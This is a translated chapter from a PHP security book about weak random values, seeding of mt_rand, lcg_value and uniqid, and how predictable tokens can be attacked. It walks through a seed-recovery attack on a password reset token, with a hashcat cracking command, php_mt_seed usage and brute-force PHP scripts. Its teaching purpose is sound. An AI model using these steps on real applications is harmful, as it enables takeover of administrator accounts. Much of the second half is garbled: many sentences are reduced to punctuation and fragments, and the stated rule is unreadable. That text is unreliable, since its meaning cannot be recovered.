
The book "Security in PHP" (Part 5). Lack of entropy for random values


The book "Security in PHP" (part 1)
The book "Security in PHP" (part 2)
The book "Security in PHP" (part 3)
The book "Security in PHP" (part 4)


Random values are everywhere in PHP: in every framework and in many libraries. You have probably written plenty of code yourself that uses random values to generate tokens and salts, or as input to other functions. Random values also play an important role in a variety of tasks:


  1. For random selection of options from a pool or a range of known options.
  2. To generate initialization vectors for encryption.
  3. To generate unpredictable tokens or one-time values (nonces) during authorization.
  4. To generate unique identifiers, such as session IDs.

All of these uses share a characteristic vulnerability. If an attacker can guess or predict the output of your random number generator (RNG) or pseudo-random number generator (PRNG), they can calculate the tokens, salts, one-time values and cryptographic initialization vectors created with it. It is therefore very important to generate high-quality random values, that is, values that are extremely difficult to predict. Never allow password reset tokens, CSRF tokens, API keys, one-time values or authorization tokens to be predictable!


Two other potential vulnerabilities are associated with random values in PHP:


  1. Information Disclosure.
  2. Lack of entropy (Insufficient Entropy).

In this context, “information disclosure” refers to a leak of the internal state of the pseudo-random number generator, that is, its seed (initial value). Such leaks make it much easier to predict the PRNG's future output.


“Insufficient entropy” describes a situation where the variability of a PRNG's initial internal state (seed), or of its output, is so small that the whole range of possible values can be enumerated by brute force relatively easily. This is not good news for PHP programmers.


We will take a closer look at both vulnerabilities, with examples of attack scenarios. But first, let's see what a random value actually is when it comes to programming in PHP.


What do random values do?


Confusion about the purpose of random values is made worse by a common misunderstanding. You have undoubtedly heard about the difference between cryptographically strong random values and vaguely “unique” values “for other uses”. The prevailing impression is that random values used in cryptography require high-quality randomness (or, more precisely, high entropy), while values for other applications can get by with less. I find this impression false and counterproductive. The real difference is between random values that must be unpredictable and those needed for trivial tasks, where predictability has no harmful consequences. Cryptography does not enter into the question at all. In other words, if you use a random value for a non-trivial task, you should automatically choose a much stronger RNG.


The strength of random values is determined by the entropy used to generate them. Entropy is a measure of uncertainty expressed in bits. For example, a binary bit can be 0 or 1. If the attacker has no idea which it is, we have 1 bit of entropy (a coin flip). If the attacker knows that the value is always 1, we have 0 bits of entropy, since predictability is the opposite of uncertainty. The entropy can also lie anywhere between 0 and 1 bit when the coin is not fair. For example, if the bit is 1 for 99% of the time, the entropy is only a little higher than 0. So the more unpredictable bits we use, the better.
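
The coin-flip figures can be checked with a few lines of PHP. This is only an illustrative sketch: the function name binary_entropy() is made up for this example, and it uses the standard Shannon entropy formula for a single bit that equals 1 with probability p.

```php
<?php
// Shannon entropy, in bits, of one bit that equals 1 with probability $p.
// binary_entropy() is a hypothetical helper name, not a PHP built-in.
function binary_entropy(float $p): float
{
    $h = 0.0;
    foreach ([$p, 1.0 - $p] as $q) {
        // An outcome that never happens contributes nothing to the sum.
        if ($q > 0.0) {
            $h -= $q * log($q, 2);
        }
    }
    return $h;
}

printf("fair coin: %.3f bits\n", binary_entropy(0.5));
printf("99%% ones:  %.3f bits\n", binary_entropy(0.99));
printf("always 1:  %.3f bits\n", binary_entropy(1.0));
```

A fair coin gives exactly 1 bit, a fully predictable bit gives 0, and the 99% case lands just above 0, at roughly 0.08 bits.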


In PHP, this can be seen more clearly. The mt_rand() function generates random values, but they are always numbers, so their string form consists only of digits. It does not produce letters, special characters or any other byte values. This means the attacker needs far fewer guesses per byte, that is, the entropy is low. If we replace mt_rand() with bytes read from the Linux source /dev/random, we get truly random bytes: they are derived from noise collected from the system's device drivers and other sources. This option is obviously much better, because it provides significantly more bits of entropy.


Another mark against mt_rand() is that it is not a true random number generator but a pseudo-random one, also known as a Deterministic Random Bit Generator (DRBG). It implements an algorithm called the Mersenne Twister, which generates numbers distributed in such a way that the result resembles the output of a true random number generator. mt_rand() uses only one random value, the seed (initial value); from it, a fixed algorithm generates the pseudo-random values.


Take a look at this example; you can test it yourself:


 mt_srand((int) 1361152757.2);
 for ($i = 0; $i < 25; $i++) {
     echo mt_rand(), PHP_EOL; // prints 25 numbers in total
 }

This is a simple loop that runs after PHP's Mersenne Twister has been seeded with a fixed, predetermined value. The seed was produced by the example function given in the documentation for mt_srand(), which uses the current seconds and microseconds. If you run the code, it prints 25 pseudo-random numbers. They look random, there are no repeats, everything looks fine. Now run the code again. Notice anything? The SAME NUMBERS are printed. Run it a third, fourth and fifth time. Older versions of PHP may print a different set of numbers, but that does not change the problem, which is common to all modern versions of PHP.


If an attacker obtains the seed of such a PRNG, they can predict all of mt_rand()'s output. Protecting the seed is therefore of paramount importance. If you lose it, you can no longer claim to be generating random values...


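A seed can be generated in one of two ways:


  1. You can set it manually by calling mt_srand().
  2. You can leave mt_srand() alone and let PHP generate the seed automatically.

The second option is preferable, but legacy applications often still call mt_srand(), even after being ported to more modern versions of PHP.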


This increases the risk that an attacker will recover the seed (a Seed Recovery Attack), which gives them enough information to predict future values. Any application that leaks such information becomes vulnerable to an information disclosure attack. This is a real vulnerability, despite its seemingly passive nature. Leaking information about the local system can help an attacker in subsequent attacks, which violates the principle of defense in depth.


PHP random values


PHP uses three PRNGs internally. If an attacker gains access to the seeds used by their algorithms, they can predict the output:


  1. The Linear Congruential Generator (LCG), lcg_value().
  2. The Mersenne Twister, mt_rand().
  3. The C library function supported by the local platform, rand().

These generators are also used internally by functions such as array_rand() and uniqid(). This means an attacker who obtains all the necessary seeds can predict the output of these and any other functions that rely on PHP's internal PRNGs. It also means that you cannot improve your protection by confusing the attacker with multiple calls to the generators. This is especially true of open source applications. An attacker can predict ALL the output for any seed known to them.
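
A small sketch of what this means in practice. It assumes PHP 7.1 or later, where shuffle() draws from the same Mersenne Twister state that mt_srand() seeds; shuffle() is used here only as a convenient stand-in for "a function that relies on the internal PRNG", and shuffled_with_seed() is a hypothetical helper name.

```php
<?php
// Assumes PHP 7.1+, where shuffle() uses the generator seeded by mt_srand().
// shuffled_with_seed() is a made-up name for this illustration.
function shuffled_with_seed(int $seed): array
{
    mt_srand($seed);
    $items = range(1, 10);
    shuffle($items);
    return $items;
}

$first  = shuffled_with_seed(12345);
$second = shuffled_with_seed(12345);

echo implode(',', $first), PHP_EOL;
echo implode(',', $second), PHP_EOL;
echo $first === $second ? "identical order\n" : "different order\n";
```

Anyone who knows the seed gets the same "random" order, no matter how many different functions sit between the seed and the output.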


To improve the quality of the random values generated for non-trivial tasks, PHP needs external sources of entropy provided by the operating system. On Linux this is usually /dev/urandom, which you can read directly or access indirectly through the openssl_random_pseudo_bytes() or mcrypt_create_iv() functions. Both functions can also use a cryptographically secure pseudo-random number generator (CSPRNG) on Windows, but PHP userland has no direct way to reach that generator without the extensions that provide these functions. In other words, make sure the OpenSSL or Mcrypt extension is enabled in your PHP installation.


/dev/urandom is itself a PRNG, but it is frequently reseeded from the high-entropy source /dev/random. This makes it an unattractive target for an attacker. We try to avoid reading directly from /dev/random because it is a blocking resource: if it runs out of entropy, all reads block until enough entropy has been gathered from the system environment again. For the most critical tasks, however, you should use /dev/random.


All this leads us to the rule:


  ,     ,   openssl_pseudo_random_bytes().           /dev/urandom.           ,                  . 

A basic implementation of this rule can be found in the SecurityMultiTool reference library. As usual, PHP internals prefer to make programmers' lives harder rather than build secure solutions directly into the PHP core.
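
For orientation, here is a minimal sketch of what such a helper might look like. It is not the SecurityMultiTool code: the function name strong_random_bytes() is hypothetical, and the choice to throw instead of falling back to PHP's internal PRNGs is an assumption made for this example. On PHP 7 and later, the built-in random_bytes() covers the same need.

```php
<?php
// Hypothetical helper, not part of PHP or SecurityMultiTool: returns $length
// bytes from an OS-backed source, or throws if none is available.
function strong_random_bytes(int $length): string
{
    // Preferred source: OpenSSL. $strong reports whether a strong algorithm was used.
    if (function_exists('openssl_random_pseudo_bytes')) {
        $strong = false;
        $bytes = openssl_random_pseudo_bytes($length, $strong);
        if ($bytes !== false && $strong === true && strlen($bytes) === $length) {
            return $bytes;
        }
    }

    // Fallback: read directly from /dev/urandom where it exists.
    if (is_readable('/dev/urandom')) {
        $handle = fopen('/dev/urandom', 'rb');
        if ($handle !== false) {
            stream_set_read_buffer($handle, 0); // do not read more than we need
            $bytes = fread($handle, $length);
            fclose($handle);
            if ($bytes !== false && strlen($bytes) === $length) {
                return $bytes;
            }
        }
    }

    // Deliberately no fallback to mt_rand(), rand() or uniqid().
    throw new RuntimeException('No strong source of random bytes is available');
}

$token = bin2hex(strong_random_bytes(32));
echo $token, PHP_EOL;
```

The hex encoding is only there to make the 32 random bytes printable; it does not add or remove entropy.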


Enough theory. Now let's see how an application can be attacked, armed with the above.


Attacking random number generators in PHP


For several reasons, PHP applications commonly rely on PRNGs for non-trivial tasks.


The openssl_random_pseudo_bytes() function only became available in PHP 5.3. On Windows it suffered from blocking problems until version 5.3.4 was released. PHP 5.3 was also the version in which mcrypt_create_iv() began to support the MCRYPT_DEV_URANDOM source on Windows. Before that, Windows supported only MCRYPT_RAND, which is in effect the same system PRNG that rand() uses internally. As you can see, there were quite a few gaps before PHP 5.3, so many legacy applications written for earlier versions could not switch to stronger PRNGs.


The OpenSSL and Mcrypt extensions are both optional. Because you cannot rely on their availability even on servers running PHP 5.3, applications often use PHP's built-in PRNGs as a fallback for generating non-trivial random values.


In both cases, we end up with non-trivial tasks that rely on random values generated by PRNGs seeded with low-entropy values. This leaves us vulnerable to seed recovery attacks. Let's look at a simple example.


Imagine that we found an online application that uses the following code to generate tokens that are used in different tasks throughout the application:


 $token = hash('sha512', mt_rand()); 

There are more complicated ways of generating tokens, but this variant makes a convenient example: a single call to mt_rand(), hashed with SHA512. In practice, a programmer who decides that PHP's random value functions are “random enough” will almost certainly choose a simplified approach like this, as long as nobody mentions the word “cryptography”. Such supposedly non-cryptographic uses include access tokens, CSRF tokens, one-time API values and password reset tokens. Before proceeding, I will describe in detail the characteristics that make this application vulnerable, so that you can better understand what makes applications vulnerable in general.


Characteristics of the vulnerable application


This is not an exhaustive list. In practice, the list of characteristics may differ!


1. The server uses mod_php, which, when used with KeepAlive, allows you to handle several requests with the same PHP process


This matters because PHP's random number generators are seeded once per process. If we can send two or more requests to the same process, it will use the same seed for all of them. The essence of the attack is to use the disclosure of one token to recover the seed, and then use the seed to predict another token generated from the SAME seed (that is, in the same process). While mod_php is ideal for using multiple requests to obtain related random values, sometimes a single request is enough to extract several values related to mt_rand(), which makes the mod_php requirement unnecessary. For example, part of the entropy used to seed mt_rand() may leak through session IDs or through values output in the same request.


2. The server reveals CSRF tokens, password reset tokens or account confirmation tokens generated from mt_rand() output


To recover the seed, we need to examine a number produced by one of PHP's generators, and it does not matter how that number is used. We can extract it from any available value, whether raw mt_rand() output, a hashed CSRF token or an account verification token. Even indirect sources will do, where the random value determines some other observable behavior that gives the value away. The main limitation is that it must come from the same process that generates the second token, the one we are trying to predict. This is an “information disclosure” vulnerability. As we will soon see, leaking PRNG output can be extremely dangerous. Note that the vulnerability is not limited to a single application: you can read PRNG output from one application on the server and use it to determine the output in another application on the same server, provided both are served by the same PHP process.


3. Known weak token generation algorithm


You can calculate it:



Some methods of generating tokens are more obvious than others, and some are more popular. Weak generation methods are marked by the use of one of PHP's random number generators (for example, mt_rand()), weak entropy (no other sources of uncertain data) and/or weak hashing (for example, MD5 or no hashing at all). The code example above shows all the signs of a weak generation method. I deliberately used SHA512 hashing to demonstrate that obscuring the value is never a satisfactory solution. SHA512 is weak in this role because it is fast to compute, so an attacker can brute-force inputs on any CPU or GPU at incredible speed. And do not forget that Moore's law still applies, which means brute-force speed grows with each new generation of CPUs and GPUs. This is why passwords must be hashed with algorithms that take a fixed time to compute, regardless of processor performance or Moore's law.
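
As an aside on the last point, PHP 5.5 and later ship password_hash(), which wraps a deliberately slow algorithm. The sketch below is only an illustration of that idea; the password string and the cost value of 10 are arbitrary choices for the example.

```php
<?php
// password_hash() with PASSWORD_BCRYPT is deliberately slow to compute.
// The 'cost' option is the tuning knob: each increment doubles the work.
$hash = password_hash('correct horse battery staple', PASSWORD_BCRYPT, ['cost' => 10]);

var_dump(password_verify('correct horse battery staple', $hash)); // bool(true)
var_dump(password_verify('wrong guess', $hash));                  // bool(false)
```

Raising the cost as hardware gets faster keeps the time per guess roughly constant, which is exactly what a fast hash such as SHA512 cannot offer.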


Executing the attack


Our attack is quite simple. Over a single connection to a PHP process, we will quickly send two separate HTTP requests (request A and request B). The server keeps the connection open until the second request arrives. Request A is aimed at obtaining some available token, such as a CSRF token or a password reset token (mailed to the attacker). Do not forget other sources, such as inline markup, arbitrary IDs used in requests, and so on. We will torture this first token until it gives up its seed. All of this is part of a seed recovery attack: the seed has so little entropy that it can be brute-forced or looked up in a precomputed rainbow table.


Request B does something more interesting. We submit a request to reset the local administrator's password. This triggers generation of a token (using a random number based on the same seed that we recover via request A, provided both requests reach the same PHP process). The token is stored in the database, waiting for the administrator to use the password reset link sent by email. If we can recover the seed from the token in request A then, knowing how the token in request B is generated, we can predict the password reset token. That means we can follow the reset link before the administrator even reads the email!


Here is the sequence of events:


  1. Using request A, we obtain a token that we will reverse engineer to recover the seed.
  2. Using request B, we cause a token to be generated from the same seed. This token is stored in the application's database for a future password reset.
  3. We crack the SHA512 hash to get the random number generated by the server.
  4. We use the recovered random number to brute-force the seed that produced it.
  5. We use the seed to compute a series of random values that could underlie the password reset token.
  6. We use the resulting token(s) to reset the administrator's password.
  7. We gain access to the administrator account, have fun and profit. Well, at least we have fun.
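
The sequence above can be rehearsed in miniature in plain PHP. This is a toy sketch under loud assumptions: the seed space is artificially shrunk to 50,000 values so that PHP can search it in about a second, steps 3 and 4 are collapsed into a single loop over seeds, and the names issue_tokens() and candidate_tokens() are made up for the example. It assumes PHP 7.1 or later.

```php
<?php
// Assumption for this demo only: seeds come from a tiny space so that plain
// PHP can search it quickly. A real attack needs hashcat and php_mt_seed.
const SEED_SPACE = 50000;

// "Server": one PHP process, seeded once, issues two tokens in a row.
function issue_tokens(int $secretSeed): array
{
    mt_srand($secretSeed);
    $tokenA = hash('sha512', (string) mt_rand()); // leaked, e.g. a CSRF token
    $tokenB = hash('sha512', (string) mt_rand()); // secret password reset token
    return [$tokenA, $tokenB];
}

// "Attacker": knows token A and the algorithm, but not the seed.
// Returns every candidate for token B (distinct seeds can share a first output).
function candidate_tokens(string $leakedToken, int $seedSpace): array
{
    $candidates = [];
    for ($seed = 0; $seed < $seedSpace; $seed++) {
        mt_srand($seed);
        if (hash('sha512', (string) mt_rand()) === $leakedToken) {
            $candidates[] = hash('sha512', (string) mt_rand());
        }
    }
    return $candidates;
}

[$tokenA, $tokenB] = issue_tokens(31337);
$candidates = candidate_tokens($tokenA, SEED_SPACE);

echo in_array($tokenB, $candidates, true)
    ? "password reset token predicted\n"
    : "prediction failed\n";
```

The attacker never sees the seed or token B directly, yet token B always ends up in the candidate list, because everything after the seed is deterministic.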

Let's get hacking...


Hacking the application step by step


Step 1. Execute request A to retrieve the token.


We assume that both the target token and the password reset token depend on the output of mt_rand(), so we need to pick the token accordingly. In our imaginary scenario the application generates all its tokens the same way, so we can simply extract a CSRF token and save it for later.


Step 2. Execute request B to have a password reset token generated for the administrator account


This request is a simple submission of the password reset form. The token will be saved in the database and mailed to the user. This is the token we need to calculate correctly. If the server characteristics hold, request B is served by the same PHP process as request A, so the mt_rand() calls in both cases use the same seed. You can even use request A to capture the reset form's CSRF token, which lets you submit the form directly and streamline the procedure (it removes an intermediate round trip).


Step 3. Crack the SHA512 hash of the token obtained from request A


SHA512 fills programmers with awe: it has the biggest number in the whole SHA-2 family of algorithms. However, the token generation method chosen by our victim has one problem: the random values consist only of digits (that is, the degree of uncertainty, or entropy, is negligible). If you check the output of mt_getrandmax(), you will find that the largest random number mt_rand() can generate is 2,147,483,647, a little over 2.147 billion. This limited number of possibilities makes the SHA512 hash vulnerable to brute force.
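
To put a number on "limited", the following sketch compares the size of mt_rand()'s output range with the size of a SHA512 digest. It assumes a 64-bit PHP build so that the range fits in an integer; the variable names are chosen for this example only.

```php
<?php
// Number of distinct values mt_rand() can return: 0 .. mt_getrandmax().
$outputs = mt_getrandmax() + 1;

// Upper bound on the entropy of a single mt_rand() call, in bits.
$bits = (int) round(log($outputs, 2));

printf("mt_rand() outputs: %d (at most %d bits)\n", $outputs, $bits);
printf("SHA512 digest size: %d bits\n", strlen(hash('sha512', '', true)) * 8);
```

The hash has room for 512 bits, but the input never carries more than 31, so the attacker only ever has to search the small input space.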


Don't just take my word for it. If you have a discrete graphics card from one of the recent generations, you can try the following. Since we are looking for a single hash, I decided to use an excellent brute-force tool, hashcat-lite. It is one of the fastest versions of hashcat and is available for all major operating systems, including Windows.


Using this code, generate a token:


 $rand = mt_rand();
 echo "Random Number: ", $rand, PHP_EOL;
 // Hash the number exactly as the vulnerable application does.
 $token = hash('sha512', $rand);
 echo "Token: ", $token, PHP_EOL;

This code simulates the token from request A (the SHA512 hash hides the random number we need). Run the resulting hash through hashcat:


 ./oclHashcat-lite64 -m1700 --pw-min=1 --pw-max=10 -1?d -o ./seed.txt <SHA512 Hash> ?d?d?d?d?d?d?d?d?d?d 

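This is what all these options mean:


  1. -m1700: the hash algorithm, where 1700 means SHA-512.
  2. --pw-min=1: the minimum length of the hashed input.
  3. --pw-max=10: the maximum length of the hashed input (10 digits for mt_rand()).
  4. -1?d: a custom character set containing only digits.
  5. -o ./seed.txt: the file to which the result is written.
  6. ?d?d?d?d?d?d?d?d?d?d: the mask to use (ten digits).
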
If everything works correctly and your GPU does not melt, hashcat will recover the hashed random number in a couple of minutes. Yes, minutes. I have already explained how entropy works; now see for yourself. mt_rand() has so few possible outputs that it is realistic to compute the SHA512 hashes of all of them in a very short time. Hashing the output of mt_rand() was pointless.


Step 4. Recover the seed from the freshly cracked random number


As we saw above, extracting any mt_rand() value from its SHA512 hash takes only a couple of minutes. Armed with the random value, we can run another brute-force tool, php_mt_seed. This small utility takes mt_rand() output and brute-forces the seeds from which that value could have been generated. Download the current version, compile it and run it. If you have trouble compiling, try an older version (I had problems with the newer ones in virtual environments).


 ./php_mt_seed <RANDOM NUMBER> 

This may take a little longer than cracking SHA512, since it runs on the CPU. On a decent processor, the utility will search the entire possible range of seeds in a few minutes.


, , . mt_rand() , , (, mt_rand() ). , , . , mt_rand() Python.


Step 5. Compute candidate password reset tokens from the seed


, mt_rand() . , :


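 function predict($seed)
 {
     // Seed the PRNG with the recovered seed.
     mt_srand($seed);
     // Discard the first output, which was used for the token from request A.
     mt_rand();
     // The next output is the one hashed into the token from request B.
     $token = hash('sha512', mt_rand());
     return $token;
 }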

.


Steps 6 and 7. Reset the administrator's password and have fun!


URL, , . , , HTML ( ). XSS- , « » (Man-In-The-Browser). , ? , , , , . — , , .



mt_rand() . , mt_rand() , , « ».


, . , , mt_rand() - , , , «» , . , . mt_rand() — , ?


. mt_rand() ( ) . , mt_rand() . — , mt_rand() , .


. , , , , .



, PRNG, PHP, (. . ). :


 $token = hash('sha512', uniqid(mt_rand())); 

. , PHP- uniqid() . :


-.


, — . - , mt_rand() , mt_rand() - . uniqid() — . . . .


, «», . . . 1 000 000 . 1 , (, HTTP Date ), . , uniqid() -:


 gettimeofday((struct timeval *) &tv, (struct timezone *) NULL);
 sec = (int) tv.tv_sec;
 usec = (int) (tv.tv_usec % 0x100000);

 /* The max value usec can have is 0xF423F, so we use only five hex
  * digits for usecs.
  */
 if (more_entropy) {
     spprintf(&uniqid, 0, "%s%08x%05x%.8F", prefix, sec, usec, php_combined_lcg(TSRMLS_C) * 10);
 } else {
     spprintf(&uniqid, 0, "%s%08x%05x", prefix, sec, usec);
 }

 RETURN_STRING(uniqid, 0);

, PHP:


 function unique_id($prefix = '', $more_entropy = false)
 {
     list($usec, $sec) = explode(' ', microtime());
     $usec *= 1000000;
     if (true === $more_entropy) {
         return sprintf('%s%08x%05x%.8F', $prefix, $sec, $usec, lcg_value() * 10);
     } else {
         return sprintf('%s%08x%05x', $prefix, $sec, $usec);
     }
 }

, uniqid() 13 . 8 — Unix ( ), . 5 — . , uniqid() , uniqid() :


 $id = uniqid();
 // The first 8 hex characters are the seconds, the last 5 the microseconds.
 $time = str_split($id, 8);
 $sec = hexdec($time[0]);
 $usec = hexdec($time[1]);
 echo 'Seconds: ', $sec, PHP_EOL, 'Microseconds: ', $usec, PHP_EOL;

-. , :


 echo uniqid(), PHP_EOL;                // 514ee7f81c4b8
 echo uniqid('prefix-'), PHP_EOL;       // prefix-514ee7f81c746
 echo uniqid('prefix-', true), PHP_EOL; // prefix-514ee7f81c8993.39593322


, , uniqid() — . , uniqid() . , , 1 000 000 . , . uniqid() :


 $token = hash('sha512', uniqid(mt_rand())); 

, , mt_rand() uniqid() , SHA512-, . uniqid() , , HTTP Date. . , !


 <?php
 echo PHP_EOL;

 /**
  * Generate the token we are going to crack.
  */
 mt_srand((int) 1361723136.7);
 $token = hash('sha512', uniqid(mt_rand()));

 /**
  * Assume we have already brute-forced the seed and read the seconds
  * from the HTTP Date header, so we know the output of mt_rand() too ;)
  */
 $httpDateSeconds = time();
 $bruteForcedSeed = (int) 1361723136.7;
 mt_srand($bruteForcedSeed);
 $prefix = mt_rand();

 /**
  * The HTTP Date may be off by a second tick relative to the time()
  * used inside uniqid(), so try two consecutive seconds.
  */
 for ($j = $httpDateSeconds; $j < $httpDateSeconds + 2; $j++) {
     for ($i = 0; $i < 1000000; $i++) {
         /** Replicate uniqid() token generator in PHP (zero-padded hex, as in uniqid()) */
         $guess = hash('sha512', sprintf('%s%08x%05x', $prefix, $j, $i));
         if ($token === $guess) {
             echo PHP_EOL, 'Actual Token: ', $token, PHP_EOL, 'Forced Token: ', $guess, PHP_EOL;
             exit(0);
         }
         if (($i % 20000) == 0) {
             echo '~';
         }
     }
 }

?


, uniqid() TRUE:


 $token = hash('sha512', uniqid(mt_rand(), true)); 

-, php_combined_lcg() . lcg_value() , PHP- uniqid() . , , , . , . mt_rand() , PHP- .


 static void lcg_seed(TSRMLS_D) /* {{{ */
 {
     struct timeval tv;

     if (gettimeofday(&tv, NULL) == 0) {
         LCG(s1) = tv.tv_sec ^ (tv.tv_usec<<11);
     } else {
         LCG(s1) = 1;
     }
 #ifdef ZTS
     LCG(s2) = (long) tsrm_thread_id();
 #else
     LCG(s2) = (long) getpid();
 #endif

     /* Add entropy to s2 by calling gettimeofday() again */
     if (gettimeofday(&tv, NULL) == 0) {
         LCG(s2) ^= (tv.tv_usec<<11);
     }

     LCG(seeded) = 1;
 }

- , . .


gettimeofday() Unix Epoch ( ). , , microsecond() , . ID , Linux 32 768. , 4 , /proc/sys/kernel/pid_max , .


, , LCG, . , mt_rand() ? , .


 #ifdef PHP_WIN32
 #define GENERATE_SEED() (((long) (time(0) * GetCurrentProcessId())) ^ ((long) (1000000.0 * php_combined_lcg(TSRMLS_C))))
 #else
 #define GENERATE_SEED() (((long) (time(0) * getpid())) ^ ((long) (1000000.0 * php_combined_lcg(TSRMLS_C))))
 #endif

, PHP . . , , : , ( 0 + - gettimeofday()) . gettimeofday() , ( PHP ). , mt_rand() , .


php_combined_lcg() . lcg_value() , PHP-. , . — , .


...


, . , php_combined_lcg() , — , . lcg_value() , mt_rand() , PRNG, PHP. lcg_value() , . LCG ( mt_srand() , , - -). , : PHP.


 spprintf(&buf, 0, "%.15s%ld%ld%0.8F", remote_addr ? remote_addr : "", tv.tv_sec, (long int)tv.tv_usec, php_combined_lcg(TSRMLS_C) * 10); 

(pre-hash) ID , IP, , … php_combined_lcg() . ( 1 ID 2 php_combined_lcg() , ), . , .


, , , PHP session.entropy_file session.entropy_length. ID , ( ) php_combined_lcg() LCG-. PHP 5.3 , , , . , ID LCG.


Windows- , LCG-.


, LCG , mt_rand() , mt_rand() .


uniqid() ?


 $token = hash('sha512', uniqid(mt_rand(), true)); 

. ( !). ID , ID.


, ? uniqid() , LCG, . , ID , , , ( !).



PHP . API PRNG- , . openssl mcrypt. , , , .


, , , . , mt_rand() , , . , , RandomLib . .


. , . . : , ; , . — .


RandomLib , . , mt_rand() , uniqid() lcg_value() , PID, , - , $_ENV, posix_times() . . , RandomLib. , - (. . , - hash() ).


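 /**
  * Generate a 32-byte random value. Other methods are also available:
  * - generateInt() for integers up to PHP_INT_MAX
  * - generateString() for values mapped to a specific character range
  */
 $factory = new \RandomLib\Factory;
 $generator = $factory->getMediumStrengthGenerator();
 $token = hash('sha512', $generator->generate(32));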

, OpenSSL Mcrypt (footprint) RandomLib RandomLib , PRNG- SecurityMultiToo l.



Source: https://habr.com/ru/post/352446/

